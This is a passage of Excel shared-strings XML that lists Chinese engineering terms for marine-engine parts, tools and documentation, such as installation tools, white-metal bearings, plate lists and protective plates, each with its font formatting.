      <t>安装部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承报警</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转动环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装齿轮驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺距调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装固定装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装和拆卸装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装凸轮轴轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装长贯穿螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装止推块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装指南</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>按比例的主机外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>巴拿马面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拔出器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金导向轴瓦上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金导向轴瓦下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金焊机</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金首次生产质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金推力环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金轴颈轴承上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金轴颈轴承下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>百分表延长杆</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>百分表针轴</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳钮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升，滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板，控制油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板材部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板材检查通则</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板材质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板的冰岛文本</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板的土耳其文本</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板清单，割板方案</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板式冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板式冷却器安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板式冷却器防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板式冷却器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半弹性固定</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伴热管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绑线支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装材料型材</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装海绵</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>包装箱</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄壁轴瓦安装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄层</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保存说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板，前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板，凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板焊接详图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间框架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护挡圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护发送器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护管加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护井</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽端板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽角钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护帽明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
